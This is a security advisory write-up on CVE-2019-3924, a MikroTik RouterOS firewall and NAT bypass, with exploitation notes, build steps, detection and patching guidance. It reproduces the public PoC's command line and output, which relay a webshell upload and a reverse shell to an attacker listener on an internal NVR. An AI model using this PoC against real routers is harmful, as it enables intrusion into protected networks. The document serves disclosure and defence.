CVE-2019-3924 - MikroTik RouterOS Firewall and NAT Bypass

Vulnerability Overview

A remote, unauthenticated attacker can proxy arbitrary traffic through MikroTik RouterOS by sending specially crafted probes to the RouterOS agent binary. This permits an attacker on the WAN to reach hosts on the LAN that would normally be protected by firewall or NAT rules. The issue is tracked as CVE-2019-3924 and was demonstrated and documented in public advisories and PoC code.

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
CVE: CVE-2019-3924

Summary: The RouterOS agent responds to crafted probes in a way that allows attackers to relay connections through the router. This can be used to reach internal services from the Internet and to bypass firewall/NAT protections.

Affected Component

The issue affects MikroTik RouterOS versions prior to the stable and long-term fixes listed by vendor advisories. Affected builds include RouterOS < 6.43.12 (stable) and < 6.42.12 (long-term) as reported in public advisories.

Technical Details

The RouterOS agent listens for and responds to probes. Crafted probe sequences cause the device to proxy or forward traffic from the attacker-controlled endpoint to a target inside the LAN. The proxied traffic can be used to access management interfaces or application endpoints that should not be reachable from WAN.

The exploit leverages the agent protocol implementation to instruct the router to perform outbound connections that bridge WAN attacker to internal target.

Exploitation

A remote unauthenticated attacker runs the PoC to instruct a vulnerable RouterOS instance to connect to an internal target (for example a DVR/NVR or web admin interface) and relay a shell or webshell payload. The PoC demonstrates discovery of a target service on the LAN, uploading of a webshell, and execution of a reverse shell back to the attacker.

Proof of Concept (PoC) / Exploit

The original PoC and compiled binaries were published to Exploit-DB (EDB ID: 46444). The PoC repository and binary archive are referenced in public advisories.

Example PoC usage (from included README):

./nvr_rev_shell   --proxy_ip 192.168.1.70   --proxy_port 8291   --target_ip 10.0.0.252   --target_port 80   --listening_ip 192.168.1.7   --listening_port 1270

Sample console output (PoC run):

[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at 192.168.1.70:8291
[+] Connected!
[+] Looking for a NUUO NVR at 10.0.0.252:80
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to 192.168.1.7:1270
[+] Done!

Binary PoC archive (original): 46444.zip (Exploit-DB bin-sploits bundle).

Note: This section reproduces PoC usage that was part of the public disclosure.

Compilation (PoC build notes)

PoC was tested on Ubuntu 18.04. Dependencies include Boost, CMake and standard build tools.

Install dependencies example:

sudo apt install libboost-dev cmake build-essential

Build steps (example):

cd routeros/poc/cve_2019_3924/
mkdir build
cd build
cmake ..
make

Sample Usage

PoC accepts parameters for proxy (router), target (internal host) and listener (attacker IP/port). Example invocation shown above demonstrates targeting a NUUO NVR on the LAN through the RouterOS proxy.

Impact Assessment

Critical Risks

1. Firewall/NAT Bypass: External attacker can reach internal services that were intended to be inaccessible from WAN.
2. Remote Service Compromise: Services exposed via the proxy may be vulnerable and compromiseable.
3. Lateral Movement: Access to internal hosts can enable further compromise of the network.
4. Data Exfiltration: Internal data may be accessed or exfiltrated.
5. High Privilege Consequences: If internal services allow code execution, full system compromise may follow.

Detection Methods

Network Monitoring

• Monitor unusual RouterOS control/agent traffic on the RouterOS management port (e.g., 8291) from untrusted sources.
• Alert on RouterOS-originated outbound connections to internal hosts that are unusual for that router.

Log Analysis

• Correlate management/proxy activity timestamps with unexpected connections to internal services.
• Search for repeated or abnormal agent-protocol probes in packet captures or netflow.

Mitigation & Remediation

Immediate Mitigations

1. Restrict access to RouterOS management and agent ports on the WAN. Apply firewall rules to permit management only from trusted IPs.
2. Disable unnecessary agent or management services if not required.
3. Monitor for and block suspicious incoming management/agent probes.

Vendor Patch

Upgrade RouterOS to a version that contains the vendor fix. Vendor advisories indicated fixes in the 6.43.12 stable and 6.42.12 long-term branches or later releases. Confirm the exact patched release for your device model and RouterOS channel and apply vendor-provided updates.

Additional Hardening

• Apply principle of least privilege to administrative interfaces.
• Place management interfaces on dedicated management networks or VPNs.
• Enable log forwarding and centralized monitoring for anomalous management activity.
• Regularly apply RouterOS updates and review vendor security advisories.

Timeline (public disclosure)

• 2019-02-21: Public PoC and advisory material published (EDB, Tenable research advisory and related disclosures).
• Vendor advisories and patches were released following coordinated disclosure.

References

• Exploit-DB EDB ID 46444 (PoC binary archive).
• Tenable Research Advisory for CVE-2019-3924.
• Public demonstration video referenced in original disclosure: https://www.youtube.com/watch?v=CxyOtsNVgFg

Credits

Discovered / PoC Author: Jacob Baines
EDB ID: 46444
CVE: CVE-2019-3924

---

⚠️ DISCLAIMER: This document reproduces public exploit disclosure material and PoC usage for CVE-2019-3924. It is provided for defensive and research purposes. Use only on systems you own or are authorized to test. Unauthorized exploitation is illegal.